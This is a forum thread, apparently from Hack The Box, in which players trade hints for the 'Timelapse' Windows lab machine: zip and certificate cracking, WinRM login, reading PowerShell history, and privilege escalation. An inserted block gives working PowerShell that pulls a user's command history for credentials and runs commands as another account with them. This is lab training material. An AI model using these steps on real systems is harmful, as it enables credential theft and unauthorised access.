Finally Rooted
Thanks @cmoon for hints
Hi,
I've found a zip file which had a file in it. It's in binary format, so I don't know how to read the contents.
If anyone who has solved this or knows what to do and can point me in the right direction I would be grateful. Thank you
Let's say that I've done machines rated Hard that were comparable. I'm writing this for those who are struggling because I sure did...
Foothold
First start with doing basic enumeration. Get a grasp of what machine you are facing.
One of the first protocols you want to explore on this type of machine contains a file you want to store locally. In fact, save everything because you will need it at a later stage. Find the file that is password encrypted.
Crack this file by converting it with your favorite tool. Use the big word-list you know.
The name of the machine, Timelapse, comes into play here. Repeat the previous step.
We have 2 files. What kind of files are they? How can we utilize them in order to connect to our target? (tip: for me the short parameters in the command, e.g. -s, -k, ..., didn't work. I had to write the long version with double dashes).
- Note: This will take some googling if you don't know how to connect to this OS.
- Hint: You've seen the username while cracking and used the password the second time around.
User
You're logged in. Look around. See what the user has typed in before you logged in. Once you've found the command to check the past, you'll have seen a new account with its password. Log out, repeat...
- Note: I've read that our favorite Windows privesc tool only works in the .bat version, but I had anti-virus blocking it so I dug manually.
Priv Esc
As a side step, though you don't have to, you should get familiar with the tool BloodHound. It makes a nice graphical overview and can hunt trivial data through its pre-written queries.
- Note: The Kali version works out of the box, but you need the Python version to retrieve data and the additional importer repo to parse the JSON data into Neo4j.
So we've established a new user with additional functionality. Remember when we downloaded all those files before? Yep, that's our gateway to root.
BloodHound would've made this very clear as well. A lot of googling is required to understand how to retrieve the data we want, as not all commands are functional on this particular machine.
Also read all the files you downloaded. Something should immediately pop out.
Keep trying to retrieve it using different commands. Powershell, it just works.
Rooted!
Most of the hints in this thread are all you need, but if you have any problems you can DM me on Discord or write me a PM here.
Hi, I have foothold. Anyone have any problem with antivirus blocking the execution of just about any tool for privilege escalation?
Thank you @ctrlzero for the interesting box. Learnt two new things about Windows while doing this box
For an easy box, this one really threw me for some loops. Hadn't auth'd with SSL via e***-win** before. The nested encrypted files were fun, and after going down a rabbit hole or two the privesc path was obvious. Just swap out the whoami with the PS cmd you need to run under the svc account and add some filtering to the cmd.
As always, enum is key. Thanks @ctrlzero for the box! Learned some new techniques.
Don't need to upload any tools to the box for this one.
Hi, I am new to HTB, and I am trying to pentest the Timelapse easy-level machine. I need help: it's been 5 hours, but I am not able to start and didn't find any way to get into this machine. Can somebody help me? It will be very helpful.
Oh, thank you so much! It triggered something all right. After days of misery, the e***-w**** -c option is very misleading.
Got user! For an easy box I certainly learned some things on this one! On to root! Message me if you're stuck on enum or user. Cheers!
eta
And rooted! What a fun box! Somewhere between easy and medium I'd say. You can get everything you need pretty much with pure Kali.
Wow, this was a doozy. I wouldn't classify this as 'Easy', more medium at a minimum. As frustrating as this box was, I have to say it is one of my favorite machines I've rooted.
Foothold: Pretty easy honestly. Enumerate, enumerate, enumerate! Also make sure you're setting the right flags with the devious program you need. Otherwise you're going to waste a lot of time. Getting the user flag was extremely easy after this point.
Root: Hopefully you've been exploring the computer pretty well, because you're gonna need to learn to move laterally. Keep googling the applications on the host and you'll get it.
Thanks @ctrlzero for a great experience!
Just got this one ROOTED. It's been quite a while since I've got an HTB root, and a Windows box at that. The hints in the forum already paint a pretty solid picture, but my DMs are open for anyone who may need some nudges. 8/10 box, was definitely a solid learning experience.
Rooted, great box
Hi guys,
It is my second attempt on this box. I started fresh, as I am not sure if I missed something in the previous step. In my first attempt, I used s****** to obtain the zip file. However, this time I got an error message:
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.xx.xxx failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available.
Here is the command I used: s******** -L \\10.10.xx.xxx/S*****.
I am just wondering if something has changed so I can no longer obtain the file from there, or if it is a problem with my VM.
Thank you for your time.
Hello, I have access to s**_******, but I am a tad stuck on what to do next. I have been perusing the previously extracted documents and I am not sure if it's intended for some of the expected files to be missing.
Hey all,
I have gotten user but am having trouble with priv esc. I found the history and know I need to figure out how to execute commands as s**_d*****, but I can't figure out how to get that to work.
I think I know what to do after I pivot to s**_d*****, but I'm just having a lot of trouble on this part.
any nudge/help would be greatly appreciated
I'd say just get rid of /S***** and try it again.
I know exactly what to do, but I'm not a PowerShell coder and the original PoC looks to be broken for updated PowerShell.
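The "User" and "Priv Esc" steps of the walkthrough above, and the later posts about finding the history file and running "the ps cmd you need" under the second account, all boil down to two pieces of PowerShell. The block below is an added example, not code from this thread or from the box; it assumes you already have a WinRM shell as the foothold user and that the history file gave you another account's plaintext password. `$TargetUser` and `$TargetPass` are placeholders, and `Invoke-Command` against localhost with an explicit credential is one common way to run under another account, not necessarily the PoC the poster refers to.

```powershell
# Added example (not from the thread). Assumes an existing WinRM session as the
# foothold user on the target; $TargetUser/$TargetPass are placeholders.

# 1. Where PowerShell keeps the per-user command history (PSReadLine).
#    Get-PSReadLineOption only works when the PSReadLine module is loaded, which
#    is often not the case in a non-interactive remote shell, so fall back to
#    the default file location under the user's roaming profile.
$historyPath = $null
if (Get-Module -ListAvailable PSReadLine) {
    try { $historyPath = (Get-PSReadLineOption).HistorySavePath } catch { }
}
if (-not $historyPath) {
    $historyPath = Join-Path $env:APPDATA 'Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
}
if (Test-Path $historyPath) {
    Write-Host "History from $historyPath"
    Get-Content $historyPath
} else {
    Write-Host "No PSReadLine history found for $env:USERNAME"
}

# 2. Run a command as another account without opening a new login.
#    Build a PSCredential from the recovered password and hand it to
#    Invoke-Command; the target is the local machine, which already accepts
#    WinRM because that is how the foothold shell was obtained.
$TargetUser = 'DOMAIN\otheruser'   # placeholder: the account found in the history
$TargetPass = 'RecoveredPassword'  # placeholder: the password found in the history
$secure = ConvertTo-SecureString $TargetPass -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ($TargetUser, $secure)

# whoami confirms the new context; replace the script block with the command you
# actually need to run as that account, and pipe to Select-Object / Where-Object
# to filter the output down to what you are after.
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock { whoami }
```

If `Invoke-Command` fails with an access-denied or authentication error, check that the remote session you are in was started over WinRM (so the local WinRM listener is up) and that the password is being passed exactly as it appeared in the history file; quoting in PowerShell, not the technique, is the usual culprit.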
Wow. I want to complain about this box, but I just can't now. I really enjoyed it in the end, I really did.
User was a lot of fun. I was familiar with the connection tool, but never had to mess with certs, so that was a really nice touch.
The pivot after getting user took me a while to figure out since I'm not very familiar with Windows machines. So I really appreciate that bit since it was a great learning experience. Once that pivot was done, root just fell into place.
Great box. PM me with questions.